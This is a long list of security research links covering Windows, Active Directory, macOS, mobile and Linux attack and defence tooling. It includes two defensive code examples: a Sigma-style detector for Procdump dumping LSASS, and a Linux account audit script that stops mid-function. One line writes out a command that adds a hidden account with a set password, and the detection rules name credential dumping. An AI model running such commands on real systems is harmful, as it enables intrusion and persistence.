- Exif Viewer
- Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
- bochspwn-reloaded: A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
- drltrace: Drltrace is a library calls tracer for Windows and Linux applications.
- shellz: a small utility to track and control your ssh, telnet, web and custom shells.
- CLIP OS: Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
- How to Get Started With VMware vSphere Security « vMiss.net
- routeros: RouterOS Bug Hunt Materials Presented at Derbycon 2018
- Awesome-Study-Resources-for-Kernel-Hacking: Kernel Hacking study materials collection
- Skadi: Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux.
- taintgrind: A taint-tracking plugin for the Valgrind memory checking tool. gcc + LD_PRELOAD + taintgrind + graphviz
- UPX is a free, portable, extendable, high-performance executable packer for several executable formats. repo
- Mainframe:
- MF Sniffer: Mainframe TN3270 unencrypted TSO session user ID and password sniffer.
- uefi-jitfuck: A JIT compiler for Brainfuck running on x86_64 UEFI
- Secure Boot in the Era of the T2: Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot.
- PSPTool: Display, extract, and manipulate PSP firmware inside UEFI images
- Project Mu: is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern. github repo
- Force firmware code to be measured and attested by Secure Launch on Windows 10
- Awesome Advanced Windows Exploitation References
- windows kernel security development
- A process scanner detecting and dumping hollowed PE modules.
- dll_to_exe: Converts a DLL into EXE
- pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
- A PowerShell utility to dynamically uncover a DCShadow attack
- Security Research from the Microsoft Security Response Center (MSRC)
- DCSYNCMonitor
- Total Meltdown?
- DetectionLab: Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post here
- powerlessshell: Run PowerShell command without invoking powershell.exe.
- internal-monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
- Robber is open source tool for finding executables prone to DLL hijacking
- Remote-Desktop-Caching
- LogRM: LogRM is a post-exploitation PowerShell script which uses Windows event logs to gather information abou
- InvisiblePersistence: Persisting in the Windows registry "invisibly"
- Dynamic Tracing in Windows 10 19H1
- Capturing NetNTLM Hashes with Office [DOT] XML Documents
- LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
- Passing-the-Hash to NTLM Authenticated Web Applications
- Detours: Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.
- r0ak: r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on Windows 10 Systems.
- SpeculationControl: SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
- Reverse Engineering Windows Defender (by Alexei Bulazel): pdf and videos
- Ground Zero: Part 2-2 XOR encryption – Windows x64
- Ground Zero: Part 2-3 Building Cracked Binaries – Windows x64
- EKFiddle: A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.
- Windows Command-Line: Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
- MSconsole: Windows Console Tools
- PowerShell Remoting by Stephanos Constantinou Blog
- BloodHound Database Creator: This python script will generate a randomized data set for testing BloodHound features and analysis.
- Windows Privilege Escalation (Unquoted Path Service)
- DbgShell: A PowerShell front-end for the Windows debugger engine.
- Windows Incident Response: Updates
- Win 10 related research
- UAC bypass using CreateNewLink COM interface
- Remote NTLM relaying through meterpreter on Windows port 445, DivertTCPconn: A TCP packet diverter for Windows platform.
- Analyzing obfuscated powershell with shellcode, Empire is a PowerShell and Python post-exploitation agent. OVERVIEW OF EMPIRE 3.4 FEATURES
- Suspicious Use of Procdump: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
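The Procdump rule above, and the Sigma format it is written in, come down to one design decision: match on the command line, not on the image name, so a renamed procdump.exe is still caught. As an added example (written here, not code from the Sigma project or from the rule's author), the block below is a minimal evaluator for Sigma-style selections run over constructed Sysmon Event ID 1 records. The events, paths and both rules are assumptions made up for the demonstration; the image-based rule misses the renamed copy, the command-line rule (" -ma " together with "lsass") does not.

```python
"""Sigma-style detection of Procdump used against LSASS, resistant to renaming.

Added example, not code from the Sigma project. Events below are constructed
in the shape of Sysmon Event ID 1 fields; paths and command lines are made up.
"""
from typing import Any, Dict, List

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Tools\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svc.exe",          # renamed procdump
     "CommandLine": r"svc.exe -accepteula -ma lsass.exe out.dmp"},
    {"Image": r"C:\Tools\procdump64.exe",                           # benign target
     "CommandLine": r"procdump64.exe -ma notepad.exe np.dmp"},
    {"Image": r"C:\Windows\System32\tasklist.exe",                  # mentions lsass, no dump flag
     "CommandLine": r'tasklist /FI "IMAGENAME eq lsass.exe"'},
]

# Rule 1: match on the executable name only (what a naive rule does).
RULE_IMAGE_BASED = {
    "title": "Procdump by image name (naive)",
    "detection": {
        "selection": {"Image|endswith": ["\\procdump.exe", "\\procdump64.exe"]},
        "condition": "selection",
    },
}
# Rule 2: match on the command line, the approach the Sigma rule above takes.
RULE_CMDLINE_BASED = {
    "title": "Suspicious Use of Procdump (LSASS)",
    "detection": {
        "selection": {"CommandLine|contains|all": [" -ma ", "lsass"]},
        "condition": "selection",
    },
}


def _field_matches(value: str, modifiers: List[str], patterns: List[str]) -> bool:
    """Apply Sigma value modifiers (contains/startswith/endswith, optional 'all').
    Comparison is case-insensitive, as Sigma string matching is."""
    value = value.lower()
    pats = [p.lower() for p in patterns]
    if "contains" in modifiers:
        tests = [p in value for p in pats]
    elif "startswith" in modifiers:
        tests = [value.startswith(p) for p in pats]
    elif "endswith" in modifiers:
        tests = [value.endswith(p) for p in pats]
    else:
        tests = [value == p for p in pats]
    return all(tests) if "all" in modifiers else any(tests)


def _selection_matches(selection: Dict[str, Any], event: Dict[str, str]) -> bool:
    """A selection map is an AND over its fields; a field's value list is OR
    unless the 'all' modifier is present."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if isinstance(patterns, str):
            patterns = [patterns]
        if not _field_matches(event.get(field, ""), modifiers, patterns):
            return False
    return True


def evaluate(rule: Dict[str, Any], events: List[Dict[str, str]]) -> List[int]:
    """Return the indices of events matching the rule. Only a condition that
    names a single selection is supported, which covers both rules above."""
    detection = rule["detection"]
    selection = detection[detection["condition"].strip()]
    return [i for i, ev in enumerate(events) if _selection_matches(selection, ev)]


if __name__ == "__main__":
    for rule in (RULE_IMAGE_BASED, RULE_CMDLINE_BASED):
        print(rule["title"], "->", evaluate(rule, SAMPLE_EVENTS))
```

The image-based rule returns events 0 and 2 (and the second of those is a dump of notepad, not of LSASS), while the command-line rule returns events 0 and 1, including the renamed binary. The trade-off is that " -ma " with surrounding spaces depends on how the attacker spaced the arguments, and other dump flags or other dumping tools need rules of their own.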
- relayer: SMB Relay Attack Script
- Ps1jacker: Ps1jacker is a tool for generating COM Hijacking payload.
- python-dotnet-binaryformat: Pure Python parser for data encoded by .NET's BinaryFormatter
- WinPwnage: Elevate, UAC bypass, privilege escalation, dll hijack techniques
- Invoke-PSImage: Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
- Firework: Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.
- hUACME: Defeating Windows User Account Control
- SysmonTools: Utilities for Sysmon
- sysmon-config: Sysmon configuration file template with default high-quality event tracing.
- Sysmon: how to set up, update and use?
- Panache_Sysmon: Just another sysmon config
- Hiding malware in Windows – The basics of code injection
- Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. announcement
- Bypassing AppLocker Custom Rules: 0x09AL Security blog
- SpecuCheck: SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
- RID-Hijacking: Windows RID Hijacking persistence technique
- WSL Reloaded
- Windows oneliners to download remote payload and execute arbitrary code
- reflectivepotato: MSFRottenPotato built as a Reflective DLL. Work in progress.
- randomrepo: Repo for random stuff
- Microsoft Windows win32k.sys: Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
- rdpy: Remote Desktop Protocol in Twisted Python
- SharpWeb: .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.
- reconerator: C# Targeted Attack Reconnissance Tools
- ManbagedInjection: A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
- InveighZero: C# LLMNR/NBNS spoofer
- DanderSpritz Lab: A fully functional DanderSpritz lab in 2 commands.
- Lateral movement using URL Protocol gist
- HiddenPowerShell: This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker.
- One Windows Kernel.
- The Dog Whisperer’s Handbook: This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module.
- Attack and Defend microsoft enhanced security administrative environment
- raw-socket-snifferr: Packet capture on Windows without a kernel driver
- DCOMrade: Powershell script for enumerating vulnerable DCOM Applications
- shed: .NET runtime inspector
- Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
- How to steal NTLMv2 hashes using file download vulnerability in web application
- Securing SCOM in a Privilege Tiered Access Model–Part 1
- Simpleator: ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
- WinDbg-Samples: Sample extensions, scripts, and API uses for WinDbg.
- Windows Privilege Escalation Guide: This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.
- OrgKit: Provision a brand-new company with proper defaults in Windows, Office 365, and Azure
- Leveraging WSUS.
- windowsblindread: A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
- azucar: Security auditing tool for Azure environments
- volatility-wnf: Browse and dump Windows Notification Facilities.
- NetNTLMtoSilverTicket: SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket.
- Domain Goodness – How I Learned to LOVE AD Explorer
- Yet another sdclt UAC bypass: As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
- awesome-windows-kernel-security-development: windows kernel security development.
- An introduction to privileged file operation abuse on Windows: This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
- ALPC-BypassUAC: UAC Bypass with mmc via alpc.
- ManagedPasswordFilter: Windows Password Filter that uses managed code internally
- DeviceGuardBypasses: A repository of some of my Windows 10 Device Guard Bypasses
- rifiuti2: Windows Recycle Bin analyser
- Control Flow Guard Teleportation: The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is a valid function. demo
- The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.
- ctftool - Interactive CTF Exploration Tool: an unprivileged window could just send commands to a highly privileged window, and that's what UIPI, User Interface Privilege Isolation, prevents. This isn't a story about UIPI, but it is how it began.
- Reversing and Patching .NET Binaries with Embedded References
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Windows PowerShell Remoting: Host Based Investigation and Containment Techniques.
- .NET Manifesto: win friends and influence the loader. malwariaLabs. slides from derbycon 2019
- Bypassing Windows User Account Control
- symboliclink-testing-tools: This is a small suite of tools to test various symbolic link types of Windows.
- Run PowerShell without Powershell.exe — Best tools & techniques
- Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
- Privileged Access Workstations
- Activation Contexts — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
- Evil-WinRM: The ultimate WinRM shell for hacking/pentesting
- Understanding WdBoot (Windows Defender ELAM)
- SharpHide: Tool to create hidden registry keys.
- Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
- Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
- CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker
- Configuring Additional LSA Protection
- Getting Malicious Office Documents to Fire with Protected View Enabled
- The Internals of AppLocker:
- Part 1: Overview and Setup
- Part 2: Blocking Process Creation
- Part 3: Access Tokens and Access Checking
- Part 4: Blocking DLL Loading
- COM-Code-Helper: Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code.
- Scylla: Imports Reconstructor
- A Speed-Research on Windows Explorer's Auto-Completion
- sysmon-config: A Sysmon configuration file for everybody to fork
- Windows Event Forwarding Guidance
- Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
- Microsoft Defender Advanced Threat Protection (ATP)
- BeaKer - Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana
- python-ntlm: Automatically exported from code.google.com/p/python-ntlm
- Logging Made Easy: is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
- lme: Logging Made Easy, is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
- SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet
- Secure DevOps Kit for Azure (AzSK)
- Windows Debugger API — The End of Versioned Structures
- DisableAntiSpyware
- Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
- DefendTheFlag: Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products.
- DumpReparsePoints: This is a simple tool to dump all the reparse points on an NTFS volume.
- Certify SSL Manager: manage free https certificates for IIS
- Bypassing Credential Guard: Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory.
- WSUS Attacks Part 1: Introducing PyWSUS
- This is about adding a $ account and having it not show up in net user: net user $ LetMeIn123! /add /active:yes
- LECmd: Lnk Explorer Command line edition!!
- PECmd: Prefetch Explorer Command Line.
- Five PE Analysis Tools Worth Looking At
- pestudio: The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide.
- PEview version
- FileAlyzer
- NTCore Explorer Suite
- exeinfo github
- MitigationFlagsCliTool: Prints mitigation policy information for processes in a dump file.
- Windows 10 System Programming book samples; Windows Internals Book 7th Edition Tools; The Windows Kernel Programming book samples
- DriverMon: Monitor activity of any driver
- Windows AllTools: All reasonably stable tools
- Sysmon Internals: From File Delete Event to Kernel Code Execution
- Windows-driver-samples: This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples.
- procfilter: A YARA-integrated process denial framework for Windows
- Winerror: Get Windows Programming error codes descriptions using the command line.
- ProcessHacker: A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.
- PVE CA Cert List Utility: Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates
- Release the Kraken: Fileless injection into Windows Error Reporting service
- MinHook: The Minimalistic x86/x64 API Hooking Library for Windows.
- TokenPlayer: Manipulating and Abusing Windows Access Tokens.
- The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
- ntlmscan: scan for NTLM directories.
- Smbtouch-Scanner: Automatically scan the inner network to detect whether they are vulnerable.
- Block process creations originating from PSExec and WMI commands
- VDM: Vulnerable Driver Manipulation. physmem_drivers: A collection of various vulnerable (mostly physical memory exposing) drivers.
- Source code for HppDLL: local password dumping using MsvpPasswordValidate hooks
- SharpMapExec: A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.
- Fibratus: A modern tool for the Windows kernel exploration and observability.
- Ultimate WDAC Bypass List: A centralized resource for previously documented WDAC bypass techniques
- Live Patching Windows API Calls Using PowerShell
- Active Directory Control Paths
- Gaining Domain Admin from Outside Active Directory, using Responder(LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
- Invoke-ADLabDeployer: Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
- PowerShellClassLab: This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server.
- ADImporter
- Low Privilege Active Directory Enumeration from a non-Domain Joined Host
- Active Directory as a C2
- Escalating privileges with ACLs in Active Directory
- Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
- #TR19 Active Directory Security Track
- Penetration Testing Active Directory, Part I: I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD.
- Penetration Testing Active Directory, Part II: For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation.
- Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory.
- Exploiting PrivExchange: The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host.
- Case Study: Password Analysis with BloodHound
- Introducing BloodHound 4.0: The Azure Update
- Bypassing AD account lockout for a compromised account
- Azure AD and ADFS best practices: Defending against password spray attacks
- windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
- LDAP Ping and Determining Your Machine’s Site
- Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
- Active Directory administrative tier model
- Exchange-AD-Privesc: Exchange privilege escalations to Active Directory
- Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
- Hunting for reconnaissance activities using LDAP search filters
- Faking an AD account password change is possible, but detectable.
- Ethical Hacking Lessons — Building Free Active Directory Lab in Azure
- Configure the log analytics wizard
- SharpHound3
- Reset the krbtgt account password/keys
- GetNPUsers & Kerberos Pre-Auth Explained
- New-KrbtgtKeys.ps1: This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation.
- WinPwn: Automation for internal Windows Penetrationtest / AD-Security
- BadBlood by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is run on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active…
- Vulnerable-AD: Create a vulnerable Active Directory that allows you to test most Active Directory attacks in a local lab.
- ATTACK MAPPING WITH BLOODHOUND
- EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
- Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
- Active Directory Lab Setup Tool. ADLab: Active Directory Lab for Penetration Testing
- Rubeus: is a C# toolset for raw Kerberos interaction and abuses.
- Enabling Active Directory DNS query logging
- A little tool to play with Windows security
- Preventing Mimikatz Attacks – Blue Team – Medium
- pypykatz: Mimikatz implementation in pure Python
- Walk-through Mimikatz sekurlsa module
- (pt-br) Mimikatz: Mitigando ataques de roubo de credenciais
- PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
- SharpKatz: Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
- PowerShell Scripts: Collection of PowerShell scripts
- Example of Malicious DLL Injected in PowerShell
- POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
- Empire: Empire is a PowerShell and Python 3.x post-exploitation framework.
- Invisi-Shell: Hide your Powershell script in plain sight. Bypass all Powershell security features.
- DevSec Defense- How DevOps Practices Can Drive Detection Development For Defenders
- Chimera: is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
- Geeking out with UEFI, again
- Stracciatella: OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
- Detailed properties in the Office 365 audit log
- Office 365 Mail Forwarding Rules (and other Mail Rules too)
- Application Guard for Office (public preview) for admins
- o365spray: Username enumeration and password spraying tool aimed at Microsoft O365.
- AdminSubmissionsAPI scripts for URL and mail submission. Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers.
- Commentator: Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m).
- Exploiting MFA Inconsistencies on Microsoft Services. MFASweep: A tool for checking if MFA is enabled on multiple Microsoft Services
- msoffcrypto-tool: Python tool and library for decrypting MS Office files with passwords or other keys
- pyxlsb2: an Excel 2007+ Binary Workbook (xlsb) parser for Python
- An iOS App In Assembly
- Having fun with macOS 1days
- x18-leak: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.
- EmPyre: A post-exploitation OS X/Linux agent written in Python 2.7
- SDQAnalyzer: a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol.
- Inside Code Signing
- jelbrekTime: A developer jailbreak for Apple Watch S3 watchOS 4.1
- Disabling MacOS SIP via a VirtualBox kext Vulnerability
- mOSL: Bash script to audit and fix macOS High Sierra (10.13.x) security settings
- Objective-See:
- DoNotDisturb: Detect Evil Maid Attacks
- sniffMK: sniff mouse and keyboard events
- Remote Mac Exploitation Via Custom URL Schemes
- The Mac Malware of 2018
- KisMac2: KisMAC is a free, open source wireless stumbling and security tool for Mac OS X.
- osx-security-awesome: A collection of OSX and iOS security resources
- threadexec: A library to execute code in the context of other processes on iOS 11.
- Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
- iOS12 Kernelcache Laundering
- kernelcache-laundering: load iOS12 kernelcaches and PAC code in IDA
- Armor: a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Tool Designed To Create Encrypted macOS Payloads
- inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
- opendrop: An open Apple AirDrop implementation written in Python
- A sample of the iOS malware- sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
- ipwndfu: open-source jailbreaking tool for older iOS devices.
- Pair Locking your iPhone with Configurator 2
- KTRW: The journey to build a debuggable iPhone.
- Privilege Escalation | macOS Malware & The Path to Root Part 2. JSS-Scripts: Random scripts for use in the Jamf Pro.
- MacOS Red Teaming 211: Dylib Hijacking
- iOS Application Injection: Having been interested in jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected.
- The Mac Malware of 2019 👾: a comprehensive analysis of the year's new malware
- OSX.EvilQuest Uncovered
- Low-Level Process Hunting on macOS
- CVE-2020–9934: Bypassing TCC ...for unauthorized access to sensitive user data!
- Attack Secure Boot of SEP windknown@pangu
- Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities
- Sinter: New user-mode security enforcement for macOS. A user-mode application authorization system for MacOS written in Swift
- Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
- macOS-Fortress: Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav).
- From zero to tfp0 - Part 1: Prologue
- From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
- We Hacked Apple for 3 Months: Here’s What We Found, some useful scripts available
- MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
- NetworkSniffer: Log iOS network traffic without a proxy
- tip toeing past android 7’s network security configuration
- A Story About Three Bluetooth Vulnerabilities in Android
- Creating an Android Open Source Research Device on Your PC
- Droidefense: Advance Android Malware Analysis Framework
- android-device-check: Check Android device security settings
- Project Zero: OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
- I'm looking at a Huawei P20 from China, let's see what I can find
- Tracking down the developer of Android adware affecting millions of users
- CLI tool to analyze APKs
- Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot
- TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices
- Exploiting Android Messengers with WebRTC: Part 3
- setools-android: Unofficial port of setools to Android with additional sepolicy-inject utility included.
- Security Guidelines: OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data.
- BCC: Tools for BPF-based Linux IO analysis, networking, monitoring, and more
- OpenSnitch is a GNU/Linux port of the Little Snitch application firewall
- Security Onion:Linux distro for IDS, NSM, and Log Management
- Linux Kernel Defence Map
- wcc: The Witchcraft Compiler Collection
- Ground Zero: Reverse Engineering:
- Part 1-2: Password Protected Reverse Shells – Linux x64
- Active Directory Dojo:
- Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
- Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh
- Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh
- Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh
- Dmesg under the hood: Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user.
- Randomize your MAC address using NetworkManager
- Shadow-Box: Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - presentation and other papers
- Privilege Escalation: pentestbook
- Project Zero: A cache invalidation bug in Linux memory management
- Announcing flickerfree boot for Fedora 29
- The Linux Backdoor Attempt of 2003
- (PT-BR) Análise de binários em Linux
- GMER: Rootkit Detector and Remover
- suprotect: Changing memory protection in an arbitrary process
- A look at home routers, and a surprising bug in Linux/MIPS
- (pt-br) Hacking Tricks: Escalação de Privilégio em Linux com Capability
- Basic Linux Privilege Escalation: It's just a basic & rough guide.
- Linux process infection (part I): Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence.
- tpotce: T-Pot Universal Installer and ISO Creator.
- Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials: LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
- Linux Kernel exploitation Tutorial.
- The 101 of ELF files on Linux: Understanding and Analysis - Linux Audit
- ebpf_exporter: Prometheus exporter for custom eBPF metrics
- Zydra: a file password recovery tool and Linux shadow file cracker. It uses dictionary search or brute force to crack passwords.
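The LXD entry above makes the point that membership of the local lxd group is root in all but name, and the shadow-file cracker entry is a reminder that what sits in /etc/shadow decides how fast that file falls. As an added example serving both entries (written here, not code from LXD, Zydra or any other project), the block below audits constructed /etc/passwd, /etc/group and /etc/shadow contents: it lists non-root users who reach root through such groups, counting both explicit members and the primary gid from /etc/passwd, and flags shadow entries with an empty password field or a legacy hash. The sample files, the set of root-equivalent groups and the hash-prefix table are assumptions for the demonstration.

```python
"""Local account audit over /etc/passwd, /etc/group and /etc/shadow contents.

Added example, not taken from any project. All three sample files below are
constructed; the group set and hash-prefix table are assumptions to adapt.
"""
from typing import Dict, List, Set, Tuple

# Groups whose membership is effectively root: lxd (see the LXD entry), docker, sudo/wheel.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel"}  # assumption: extend per distro

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
svc:x:1002:110::/var/lib/svc:/usr/sbin/nologin
"""
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:alice
lxd:x:110:bob
docker:x:999:
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
alice:$y$j9T$saltsalt$hashhash:19000:0:99999:7:::
bob:$1$abcdefgh$hashhashhash:18000:0:99999:7:::
svc::19000:0:99999:7:::
guest:*:19000:0:99999:7:::
"""

# crypt(3) hash identifiers; anything not listed is reported as unrecognized.
HASH_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$5$": "sha256crypt",
                 "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}
LEGACY = {"md5crypt", "descrypt"}  # cheap to brute-force with a dictionary


def parse_passwd(text: str) -> Dict[str, Tuple[int, int]]:
    """user name -> (uid, primary gid)."""
    users: Dict[str, Tuple[int, int]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, *_rest = line.split(":")
        users[name] = (int(uid), int(gid))
    return users


def parse_group(text: str) -> Dict[str, Tuple[int, Set[str]]]:
    """group name -> (gid, explicitly listed members)."""
    groups: Dict[str, Tuple[int, Set[str]]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":")
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def root_equivalent_members(users: Dict[str, Tuple[int, int]],
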